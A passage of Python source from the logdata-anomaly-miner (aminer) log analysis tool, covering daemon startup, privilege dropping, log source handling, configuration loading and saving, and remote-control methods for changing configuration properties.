file_path = os.path.join(persistence_dir, filename) try: if not os.path.exists(file_path): continue if not os.path.isdir(file_path): msg = 'The aminer persistence directory should not contain any files.' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) continue shutil.rmtree(file_path) except OSError as e: msg = f"Failed to delete {file_path}. 
Reason: {e}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) if restore_relative_persistence_path is not None: absolute_persistence_path = os.path.join(persistence_dir, 'backup', restore_relative_persistence_path) if not os.path.exists(absolute_persistence_path): msg = f"{absolute_persistence_path} does not exist. Continuing without restoring persistence." print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) else: clear_persistence(persistence_dir) copytree(absolute_persistence_path, persistence_dir) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) for dirpath, _dirnames, filenames in os.walk(persistence_dir): os.chown(dirpath, child_user_id, child_group_id, dir_fd=persistence_dir_fd, follow_symlinks=False) for filename in filenames: os.chown(os.path.join(dirpath, filename), child_user_id, child_user_id, dir_fd=persistence_dir_fd, follow_symlinks=False) if from_begin_flag: repositioning_data_path = os.path.join(aminer_config.config_properties.get( AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR), 'AnalysisChild', 'RepositioningData') if os.path.exists(repositioning_data_path): os.remove(repositioning_data_path) if run_analysis_child_flag: # Call analysis process, this function will never return. run_analysis_child(aminer_config, program_name) # Start importing of aminer specific components after reading of "config.py" to allow replacement of components via sys.path # from within configuration. log_sources_list = aminer_config.config_properties.get(AminerConfig.KEY_LOG_SOURCES_LIST) if (log_sources_list is None) or not log_sources_list: msg = f"{program_name}: {AminerConfig.KEY_LOG_SOURCES_LIST} not defined" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) # Now create the management entries for each logfile. 
log_data_resource_dict = {} for log_resource_name in log_sources_list: # From here on log_resource_name is a byte array. log_resource_name = decode_string_as_byte_string(log_resource_name) log_resource = None if log_resource_name.startswith(b'file://'): log_resource = FileLogDataResource(log_resource_name, -1) elif log_resource_name.startswith(b'unix://'): log_resource = UnixSocketLogDataResource(log_resource_name, -1) else: msg = f"Unsupported schema in {AminerConfig.KEY_LOG_SOURCES_LIST}: {repr(log_resource_name)}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if not os.path.exists(log_resource_name[7:].decode()): msg = f"WARNING: file or socket '{log_resource_name[7:].decode()}' does not exist (yet)!" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) try: log_resource.open() except OSError as open_os_error: if open_os_error.errno == errno.EACCES: msg = f"{program_name}: no permission to access{repr(log_resource_name)}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) else: msg = f"{program_name}: unexpected error opening {repr(log_resource_name)}: {open_os_error.errno} " \ f"({os.strerror(open_os_error.errno)})" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) log_data_resource_dict[log_resource_name] = log_resource # Create the remote control socket, if any. Do this in privileged mode to allow binding it at arbitrary locations and support restricted # permissions of any type for current (privileged) uid. 
remote_control_socket_name = aminer_config.config_properties.get(AminerConfig.KEY_REMOTE_CONTROL_SOCKET_PATH, None) remote_control_socket = None if remote_control_socket_name is not None: if os.path.exists(remote_control_socket_name): try: os.unlink(remote_control_socket_name) except OSError: msg = f"Failed to clean up old remote control socket at {remote_control_socket_name}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) # Create the local socket: there is no easy way to create it with correct permissions, hence a fork is needed, setting umask, # bind the socket. It is also recommended to create the socket in a directory having the correct permissions already. remote_control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) remote_control_socket.setblocking(False) bind_child_pid = os.fork() if bind_child_pid == 0: os.umask(0o177) remote_control_socket.bind(remote_control_socket_name) # Do not perform any cleanup, flushing of streams. Use _exit(0) to avoid interference with fork. os._exit(0) # skipcq: PYL-W0212 os.waitpid(bind_child_pid, 0) remote_control_socket.listen(4) # Now have checked all we can get from the configuration in the privileged process. Detach from the TTY when in daemon mode. if not run_in_foreground_flag: child_pid = 0 try: # Fork a child to make sure, we are not the process group leader already. child_pid = os.fork() except Exception as fork_exception: # skipcq: PYL-W0703 msg = 'Failed to daemonize: %s' % fork_exception print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if child_pid != 0: # This is the parent. os._exit(0) # skipcq: PYL-W0212 # This is the child. Create a new session and become process group leader. Here we get rid of the controlling tty. os.setsid() # Fork again to become an orphaned process not being session leader, hence not able to get a controlling tty again. 
try: child_pid = os.fork() except Exception as fork_exception: # skipcq: PYL-W0703 msg = f"Failed to daemonize: {fork_exception}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if child_pid != 0: # This is the parent. os._exit(0) # skipcq: PYL-W0212 # Move to root directory to avoid lingering in some cwd someone else might want to unmount. os.chdir('/') # Change the umask here to clean all group/other mask bits so that accidentially created files are not accessible by other. os.umask(0o77) # Install a signal handler catching common stop signals and relaying it to all children for sure. # skipcq: PYL-W0603 global child_termination_triggered_flag child_termination_triggered_flag = False def graceful_shutdown_handler(_signo, _stackFrame): """React on typical shutdown signals.""" msg = '%s: caught signal, shutting down' % program_name print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info(msg) # Just set the flag. It is likely, that child received same signal also so avoid multiple signaling, which could interrupt the # shutdown procedure again. # skipcq: PYL-W0603 global child_termination_triggered_flag child_termination_triggered_flag = True import signal signal.signal(signal.SIGHUP, graceful_shutdown_handler) signal.signal(signal.SIGINT, graceful_shutdown_handler) signal.signal(signal.SIGTERM, graceful_shutdown_handler) # Now create the socket to connect the analysis child. (parent_socket, child_socket) = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM, 0) # Have it nonblocking from here on. parent_socket.setblocking(False) child_socket.setblocking(False) # Use normal fork, we should have been detached from TTY already. Flush stderr to avoid duplication of output if both child and # parent want to write something. 
sys.stderr.flush() child_pid = os.fork() if child_pid == 0: # Relocate the child socket fd to 3 if needed if child_socket.fileno() != 3: os.dup2(child_socket.fileno(), 3) child_socket.close() # Clear the supplementary groups before dropping privileges. This makes only sense when changing the uid or gid. if os.getuid() == 0: if ((child_user_id != -1) and (child_user_id != os.getuid())) or ((child_group_id != -1) and (child_group_id != os.getgid())): os.setgroups([]) # Drop privileges before executing child. setuid/gid will raise an exception when call has failed. if child_group_id != -1: os.setgid(child_group_id) if child_user_id != -1: os.setuid(child_user_id) else: msg = 'INFO: No privilege separation when started as unprivileged user' print(msg, file=sys.stderr) tmp_username = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_USER) tmp_group = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_GROUP) aminer_user_id = -1 aminer_group_id = -1 try: if tmp_username is not None: aminer_user_id = getpwnam(tmp_username).pw_uid if tmp_group is not None: aminer_group_id = getgrnam(tmp_group).gr_gid except: # skipcq: FLK-E722 print(f"Failed to resolve {AminerConfig.KEY_AMINER_USER} or {AminerConfig.KEY_AMINER_GROUP}", file=sys.stderr) sys.exit(1) initialize_loggers(aminer_config, aminer_user_id, aminer_group_id) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info(msg) # Now resolve the specific analysis configuration file (if any). analysis_config_file_name = aminer_config.config_properties.get(AminerConfig.KEY_ANALYSIS_CONFIG_FILE, None) if analysis_config_file_name is None: analysis_config_file_name = config_file_name elif not os.path.isabs(analysis_config_file_name): analysis_config_file_name = os.path.join(os.path.dirname(config_file_name), analysis_config_file_name) # This is the child. Close all parent file descriptors, we do not need. Perhaps this could be done more elegantly. 
for close_fd in range(4, 1 << 16): try: os.close(close_fd) except OSError as open_os_error: if open_os_error.errno == errno.EBADF: continue msg = f"{program_name}: unexpected exception closing file descriptors:{open_os_error}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) # Flush stderr before exit without any cleanup. sys.stderr.flush() os._exit(1) # skipcq: PYL-W0212 # Now execute the very same program again, but user might have moved or renamed it meanwhile. This would be problematic with # SUID-binaries (which we do not yet support). Do NOT just fork but also exec to avoid child circumventing # parent's ALSR due to cloned kernel VMA. exec_args = ['aminerChild', '--run-analysis', '--config', analysis_config_file_name, '--stat', str(stat_level), '--debug', str(debug_level)] if offline_mode: exec_args.append("--offline-mode") if args.config_properties: exec_args.append("--config-properties") for config_property in args.config_properties: exec_args.append(config_property) os.execv(sys.argv[0], exec_args) # skipcq: BAN-B606 msg = 'Failed to execute child process' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.stderr.flush() os._exit(1) # skipcq: PYL-W0212 child_socket.close() # Send all log resource information currently available to child process. for log_resource_name, log_resource in log_data_resource_dict.items(): if (log_resource is not None) and (log_resource.get_file_descriptor() >= 0): SecureOSFunctions.send_logstream_descriptor(parent_socket, log_resource.get_file_descriptor(), log_resource_name) log_resource.close() # Send the remote control server socket, if any and close it afterwards. It is not needed any more on parent side. 
if remote_control_socket is not None: SecureOSFunctions.send_annotated_file_descriptor(parent_socket, remote_control_socket.fileno(), 'remotecontrol', '') remote_control_socket.close() exit_status = 0 child_termination_triggered_count = 0 while True: if child_termination_triggered_flag: if child_termination_triggered_count == 0: time.sleep(1) elif child_termination_triggered_count < 5: os.kill(child_pid, signal.SIGTERM) else: os.kill(0, signal.SIGKILL) child_termination_triggered_count += 1 (sig_child_pid, sig_status) = os.waitpid(-1, os.WNOHANG) if sig_child_pid != 0: if sig_child_pid == child_pid: if child_termination_triggered_flag or offline_mode: # This was expected, just terminate. break msg = f"{program_name}: Analysis child process {sig_child_pid} terminated unexpectedly with signal 0x{sig_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) exit_status = 1 break # So the child has been cloned, the clone has terminated. This should not happen either. msg = f"{program_name}: untracked child {sig_child_pid} terminated with with signal 0x{sig_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) exit_status = 1 # Child information handled, scan for rotated logfiles or other resources, where reopening might make sense. 
for log_resouce_name, log_data_resource in log_data_resource_dict.items(): try: if not log_data_resource.open(reopen_flag=True): continue except OSError as open_os_error: if open_os_error.errno == errno.EACCES: msg = f"{program_name}: no permission to access {log_resouce_name}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) else: msg = f"{program_name}: unexpected error reopening {log_resouce_name}: {open_os_error.errno} " \ f"({os.strerror(open_os_error.errno)})" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) exit_status = 2 continue SecureOSFunctions.send_logstream_descriptor(parent_socket, log_data_resource.get_file_descriptor(), log_resouce_name) log_data_resource.close() time.sleep(1) parent_socket.close() SecureOSFunctions.close_base_directory() SecureOSFunctions.close_log_directory() sys.exit(exit_status) main() logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/000077500000000000000000000000001437606560100272075ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/AminerConfig.py000066400000000000000000000237451437606560100321350ustar00rootroot00000000000000"""This module collects static configuration item keys and configuration loading and handling functions. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import os import sys import importlib.util import logging KEY_LOG_SOURCES_LIST = 'LogResourceList' KEY_AMINER_USER = 'AminerUser' KEY_AMINER_GROUP = 'AminerGroup' KEY_ANALYSIS_CONFIG_FILE = 'AnalysisConfigFile' KEY_PERSISTENCE_DIR = 'Core.PersistenceDir' KEY_LOG_DIR = 'Core.LogDir' DEFAULT_PERSISTENCE_DIR = '/var/lib/aminer' DEFAULT_LOG_DIR = '/var/lib/aminer/log' KEY_PERSISTENCE_PERIOD = 'Core.PersistencePeriod' DEFAULT_PERSISTENCE_PERIOD = 600 KEY_REMOTE_CONTROL_SOCKET_PATH = 'RemoteControlSocket' KEY_LOG_PREFIX = 'LogPrefix' KEY_RESOURCES_MAX_MEMORY_USAGE = 'Resources.MaxMemoryUsage' REMOTE_CONTROL_LOG_NAME = 'REMOTE_CONTROL' KEY_REMOTE_CONTROL_LOG_FILE = 'Log.RemoteControlLogFile' DEFAULT_REMOTE_CONTROL_LOG_FILE = 'aminerRemoteLog.txt' configFN = None STAT_LEVEL = 1 STAT_LOG_NAME = 'STAT' KEY_STAT_LOG_FILE = 'Log.StatisticsFile' DEFAULT_STAT_LOG_FILE = 'statistics.log' DEBUG_LEVEL = 1 DEBUG_LOG_NAME = 'DEBUG' KEY_DEBUG_LOG_FILE = 'Log.DebugFile' DEFAULT_DEBUG_LOG_FILE = 'aminer.log' KEY_LOG_STAT_PERIOD = 'Log.StatisticsPeriod' DEFAULT_STAT_PERIOD = 3600 KEY_LOG_STAT_LEVEL = 'Log.StatisticsLevel' KEY_LOG_DEBUG_LEVEL = 'Log.DebugLevel' KEY_LOG_ROTATION_MAX_BYTES = 'Log.Rotation.MaxBytes' DEFAULT_LOG_ROTATION_MAX_BYTES = 2 << 19 # 1 Megabyte KEY_LOG_ROTATION_BACKUP_COUNT = 'Log.Rotation.BackupCount' DEFAULT_LOG_ROTATION_BACKUP_COUNT = 5 CONFIG_KEY_LOG_LINE_PREFIX = 'LogPrefix' DEFAULT_LOG_LINE_PREFIX = '' CONFIG_KEY_ENCODING = 'Log.Encoding' ENCODING = 'utf-8' def load_config(config_file_name): """Load the configuration file using the import module.""" aminer_config = None # skipcq: PYL-W0603 global configFN configFN = config_file_name ymlext = ['.YAML', '.YML', '.yaml', '.yml'] extension = os.path.splitext(config_file_name)[1] yaml_config = None if extension in ymlext: yaml_config = config_file_name config_file_name = os.path.dirname(os.path.abspath(__file__)) + '/' + 'YamlConfig.py' try: spec = importlib.util.spec_from_file_location('aminer_config', 
config_file_name) aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) if extension in ymlext: # skipcq: FLK-E722 aminer_config.load_yaml(yaml_config) except ValueError as e: logging.getLogger(DEBUG_LOG_NAME).error(e) raise e except Exception: msg = f"Failed to load configuration from {config_file_name}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) exception_info = sys.exc_info() logging.getLogger(DEBUG_LOG_NAME).error(exception_info) raise Exception(exception_info[0], exception_info[1], exception_info[2]) return aminer_config def build_persistence_file_name(aminer_config, *args): """Build the full persistence file name from persistence directory configuration and path parts.""" persistence_dir_name = aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) return os.path.join(persistence_dir_name, *args) def save_config(analysis_context, new_file): """Save the current configuration to a file by using the aminerRemoteControl.""" register_component = 'register_component(' VAR_ID = 0 msg = "" with open(configFN, "r") as file: old = file.read() for config_property in analysis_context.aminer_config.config_properties: find_str = f"config_properties['{config_property}'] = " pos = old.find(find_str) if pos == -1: msg += f"WARNING: {find_str}not found in the old config file.\n" rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME) rc_logger.warning(msg.strip('\n')) else: string = old[pos + len(find_str):] old_len = string.find('\n') string = string[:old_len] prop = analysis_context.aminer_config.config_properties[config_property] if (string[0] == "'" and string[-1] == "'") or (string[0] == '"' and string[-1] == '"'): prop = "'" + prop + "'" if f"{string}" != f"{prop}": old = old[:pos + len(find_str)] + f"{prop}" + old[pos + len(find_str) + old_len:] for component_id in analysis_context.get_registered_component_ids(): component = analysis_context.get_component_by_id(component_id) 
name = analysis_context.get_name_by_component(component) start = 0 old_start = 0 for i in range(0, component_id + 1): start = start + 1 start = old.find('.register_component(', start) if old_start > start: break old_start = start if old.find('component_name', start) < old.find(')', start): old_component_name_start = old.find('"', old.find('component_name', start)) old_component_name_end = old.find('"', old_component_name_start + 1) if old_component_name_start > old.find(')', start) or old_component_name_start == -1: old_component_name_start = old.find("'", old.find('component_name', start)) old_component_name_end = old.find("'", old_component_name_start + 1) old_len = old_component_name_end - old_component_name_start + 1 old_component_name = old[old_component_name_start:] old_component_name = old_component_name[:old_len] if old_component_name != f'"{name}"': old = old[:old_component_name_start] + f'"{name}"' + old[old_component_name_end + 1:] log_dir = analysis_context.aminer_config.config_properties.get(KEY_LOG_DIR, DEFAULT_LOG_DIR) remote_control_log_file = analysis_context.aminer_config.config_properties.get( KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, DEFAULT_REMOTE_CONTROL_LOG_FILE)) try: with open(remote_control_log_file, "r") as logFile: logs = logFile.readlines() except OSError as e: msg = f"Could not read {remote_control_log_file}: {e}\n" logging.getLogger(DEBUG_LOG_NAME).error(msg.strip('\n')) print(msg, file=sys.stderr) i = len(logs) - 1 while i > 0: if "INFO aminer started." 
in logs[i]: logs = logs[i:] break i = i - 1 for i, log in enumerate(logs): if "REMOTECONTROL change_attribute_of_registered_analysis_component" in log: log = log[:log.find('#')] arr = log.split(',', 3) if arr[1].find("'") != -1: component_name = arr[1].split("'")[1] else: component_name = arr[1].split('"')[1] if arr[2].find("'") != -1: attr = arr[2].split("'")[1] else: attr = arr[2].split('"')[1] value = arr[3].strip().split(")")[0] pos = old.find(f'component_name="{component_name}"') if pos == -1: pos = old.find(f"component_name='{component_name}'") while old[pos] != '\n': pos = pos - 1 pos = old.find(register_component, pos) + len(register_component) var = old[pos:old.find(',', pos)] pos = old.find(f"{var} =") if pos == -1: pos = old.find(f"{var}=") pos = old.find(attr, pos) p1 = old.find(")", pos) p2 = old.find(",", pos) if -1 not in (p1, p2): end = min(old.find(")", pos), old.find(",", pos)) elif p1 == -1 and p2 == -1: msg += f"WARNING: '{component_name}.{attr}' could not be found in the current config!\n" rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME) rc_logger.warning(msg.strip('\n')) continue elif p1 == -1: end = p2 elif p2 == -1: end = p1 old = old[:old.find("=", pos) + 1] + f"{value}" + old[end:] if "REMOTECONTROL add_handler_to_atom_filter_and_register_analysis_component" in log: parameters = log.split(",", 2) # find the name of the filter_config variable in the old config. 
pos = old.find(parameters[1].strip()) new_pos = pos while old[new_pos] != '\n': new_pos = new_pos - 1 filter_config = old[new_pos:pos] pos = filter_config.find(register_component) + len(register_component) filter_config = filter_config[pos:filter_config.find(',', pos)].strip() new_parameters = parameters[2].split(")") component_name = new_parameters[1].strip(', ') var = f"analysis_component{VAR_ID}" VAR_ID = VAR_ID + 1 old = old + f"\n {var} = {new_parameters[0].strip()})" old = old + f"\n {filter_config}.register_component({var}, component_name={component_name})" old = old + f"\n {filter_config}.add_handler({var})\n" # remove double lines old = old.replace('\n\n\n', '\n\n') try: with open(new_file, "w") as file: file.write(old) msg += f"Successfully saved the current config to {new_file}." logging.getLogger(DEBUG_LOG_NAME).info(msg) return msg except FileNotFoundError: msg += f"FAILURE: file '{new_file}' could not be found or opened!" logging.getLogger(DEBUG_LOG_NAME).error(msg) return msg AminerRemoteControlExecutionMethods.py000066400000000000000000001211031437606560100366400ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer"""This module contains methods which can be executed from the aminerRemoteControl class. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" import aminer import resource import os import shutil from time import time from datetime import datetime import logging import re from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer import AnalysisChild, AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_LEVEL, KEY_LOG_DEBUG_LEVEL, KEY_LOG_STAT_PERIOD,\ KEY_RESOURCES_MAX_MEMORY_USAGE, KEY_LOG_PREFIX, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, KEY_LOG_SOURCES_LIST, DEBUG_LOG_NAME attr_str = '"%s": %s,\n' component_not_found = 'Event history component not found.' class AminerRemoteControlExecutionMethods: """This class defines all possible methods for the remote control.""" REMOTE_CONTROL_RESPONSE = '' ERROR_MESSAGE_RESOURCE_NOT_FOUND = '"Resource \\"%s\\" could not be found."' CONFIG_KEY_MAIL_TARGET_ADDRESS = 'MailAlerting.TargetAddress' CONFIG_KEY_MAIL_FROM_ADDRESS = 'MailAlerting.FromAddress' CONFIG_KEY_MAIL_SUBJECT_PREFIX = 'MailAlerting.SubjectPrefix' CONFIG_KEY_MAIL_ALERT_GRACE_TIME = 'MailAlerting.AlertGraceTime' CONFIG_KEY_EVENT_COLLECT_TIME = 'MailAlerting.EventCollectTime' CONFIG_KEY_ALERT_MIN_GAP = 'MailAlerting.MinAlertGap' CONFIG_KEY_ALERT_MAX_GAP = 'MailAlerting.MaxAlertGap' CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE = 'MailAlerting.MaxEventsPerMessage' MAIL_CONFIG_PROPERTIES = [CONFIG_KEY_MAIL_TARGET_ADDRESS, CONFIG_KEY_MAIL_FROM_ADDRESS] INTEGER_CONFIG_PROPERTY_LIST = [ CONFIG_KEY_MAIL_ALERT_GRACE_TIME, CONFIG_KEY_EVENT_COLLECT_TIME, CONFIG_KEY_ALERT_MIN_GAP, CONFIG_KEY_ALERT_MAX_GAP, CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_LEVEL, KEY_LOG_DEBUG_LEVEL, KEY_LOG_STAT_PERIOD, KEY_RESOURCES_MAX_MEMORY_USAGE ] STRING_CONFIG_PROPERTY_LIST = [ CONFIG_KEY_MAIL_TARGET_ADDRESS, CONFIG_KEY_MAIL_FROM_ADDRESS, CONFIG_KEY_MAIL_SUBJECT_PREFIX, KEY_LOG_PREFIX ] def print_response(self, value): """Add a value to the response string.""" self.REMOTE_CONTROL_RESPONSE += str(value) def 
change_config_property(self, analysis_context, property_name, value): """Change a config_property in an running aminer instance.""" result = 0 config_keys_mail_alerting = [ self.CONFIG_KEY_MAIL_TARGET_ADDRESS, self.CONFIG_KEY_MAIL_FROM_ADDRESS, self.CONFIG_KEY_MAIL_SUBJECT_PREFIX, self.CONFIG_KEY_EVENT_COLLECT_TIME, self.CONFIG_KEY_ALERT_MIN_GAP, self.CONFIG_KEY_ALERT_MAX_GAP, self.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, self.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] if not isinstance(analysis_context, AnalysisChild.AnalysisContext): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the analysis_context must be of type {AnalysisChild.AnalysisContext.__class__}." return if property_name not in self.INTEGER_CONFIG_PROPERTY_LIST + self.STRING_CONFIG_PROPERTY_LIST: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the property '{property_name}' does not exist in the current config!" return if property_name in self.INTEGER_CONFIG_PROPERTY_LIST: t = int else: t = str if not isinstance(value, t): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the value of the property '{property_name}' must be of type {t}!" return if property_name in [KEY_PERSISTENCE_DIR, KEY_LOG_SOURCES_LIST]: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the property '{property_name}' can only be changed at startup in the aminer root" \ f" process!" 
return if property_name == KEY_RESOURCES_MAX_MEMORY_USAGE: result = self.change_config_property_max_memory(analysis_context, value) elif property_name in config_keys_mail_alerting: result = self.change_config_property_mail_alerting(analysis_context, property_name, value) elif property_name in (KEY_LOG_PREFIX, KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_PERIOD): analysis_context.aminer_config.config_properties[property_name] = value result = 0 elif property_name == KEY_LOG_STAT_LEVEL: result = self.change_config_property_log_stat_level(analysis_context, value) elif property_name == KEY_LOG_DEBUG_LEVEL: result = self.change_config_property_log_debug_level(analysis_context, value) else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: property {property_name} could not be changed. Please check the property_name again." return if result == 0: msg = f"'{property_name}' changed to '{value}' successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def change_config_property_mail_alerting(self, analysis_context, property_name, value): """Change any mail property.""" is_email = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)|^[a-zA-Z0-9]+@localhost$") if property_name in self.MAIL_CONFIG_PROPERTIES and not is_email.match(value): self.REMOTE_CONTROL_RESPONSE += "FAILURE: MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!" 
return 1 analysis_context.aminer_config.config_properties[property_name] = value for analysis_component_id in analysis_context.get_registered_component_ids(): component = analysis_context.get_component_by_id(analysis_component_id) if component.__class__.__name__ == "DefaultMailNotificationEventHandler": setattr(component, property_name, value) return 0 def change_config_property_max_memory(self, analysis_context, max_memory_mb): """Change the maximal allowed RAM usage of the aminer instance.""" try: max_memory_mb = int(max_memory_mb) if max_memory_mb < 32 and max_memory_mb != -1: self.REMOTE_CONTROL_RESPONSE += "FAILURE: it is not safe to run the aminer with less than 32MB RAM." return 1 resource.setrlimit(resource.RLIMIT_AS, (max_memory_mb * 1024 * 1024, resource.RLIM_INFINITY)) analysis_context.aminer_config.config_properties[KEY_RESOURCES_MAX_MEMORY_USAGE] = max_memory_mb return 0 except ValueError: self.REMOTE_CONTROL_RESPONSE += "FAILURE: property 'maxMemoryUsage' must be of type Integer!" return 1 def change_config_property_log_stat_level(self, analysis_context, stat_level): """Set the statistic logging level.""" if stat_level in (0, 1, 2): analysis_context.aminer_config.config_properties[KEY_LOG_STAT_LEVEL] = stat_level AminerConfig.STAT_LEVEL = stat_level return 0 self.REMOTE_CONTROL_RESPONSE += f"FAILURE: STAT_LEVEL {stat_level} is not allowed. Allowed STAT_LEVEL values are 0, 1, 2." return 1 def change_config_property_log_debug_level(self, analysis_context, debug_level): """Set the debug log level.""" if debug_level in (0, 1, 2): analysis_context.aminer_config.config_properties[KEY_LOG_DEBUG_LEVEL] = debug_level AminerConfig.DEBUG_LEVEL = debug_level debug_logger = logging.getLogger(DEBUG_LOG_NAME) if debug_level == 0: debug_logger.setLevel(logging.ERROR) elif debug_level == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) return 0 self.REMOTE_CONTROL_RESPONSE += f"FAILURE: DEBUG_LEVEL {debug_level} is not allowed. 
Allowed DEBUG_LEVEL values are 0, 1, 2." return 1 def change_attribute_of_registered_analysis_component(self, analysis_context, component_name, attribute, value): """ Change a specific attribute of a registered component. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param attribute the name of the attribute to be printed. @param value the new value of the attribute. """ attr = getattr(analysis_context.get_component_by_name(component_name), attribute) if type(attr) is type(value): setattr(analysis_context.get_component_by_name(component_name), attribute, value) msg = f"'{component_name}.{attribute}' changed from {repr(attr)} to {value} successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: property '{component_name}.{attribute}' must be of type {type(attr)}!" def rename_registered_analysis_component(self, analysis_context, old_component_name, new_component_name): """ Rename an analysis component by removing and readding it to the analysis_context. @param analysis_context the analysis context of the aminer. @param old_component_name the current name of the component. @param new_component_name the new name of the component. """ if type(old_component_name) is not str or type(new_component_name) is not str: self.REMOTE_CONTROL_RESPONSE = "FAILURE: the parameters 'old_component_name' and 'new_component_name' must be of type str." else: component = analysis_context.get_component_by_name(old_component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{old_component_name}' does not exist." else: analysis_context.registered_components_by_name[old_component_name] = None analysis_context.registered_components_by_name[new_component_name] = component msg = f"Component '{old_component_name}' renamed to '{new_component_name}' successfully." 
self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def print_config_property(self, analysis_context, property_name): """ Print a specific config property. @param analysis_context the analysis context of the aminer. @param property_name the name of the property to be printed. """ if property_name not in analysis_context.aminer_config.config_properties: self.REMOTE_CONTROL_RESPONSE = self.ERROR_MESSAGE_RESOURCE_NOT_FOUND % property_name return val = analysis_context.aminer_config.config_properties[property_name] if isinstance(val, list): val = str(val).replace('"False"', 'false').replace('"True"', 'true').replace('"None"', 'null').strip(' ').replace("'", '"') else: val = str(val).replace('"False"', 'false').replace('"True"', 'true').replace('"None"', 'null').strip(' ') if val.isdigit(): val = int(val) elif '.' in val: try: val = float(val) except ValueError: # skipcq: FLK-E722 pass self.REMOTE_CONTROL_RESPONSE = f'"{property_name}": {val}' def print_attribute_of_registered_analysis_component(self, analysis_context, component_name, attribute): """ Print a specific attribute of a registered component. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param attribute the name of the attribute to be printed. """ if type(component_name) is not str or type(attribute) is not str: 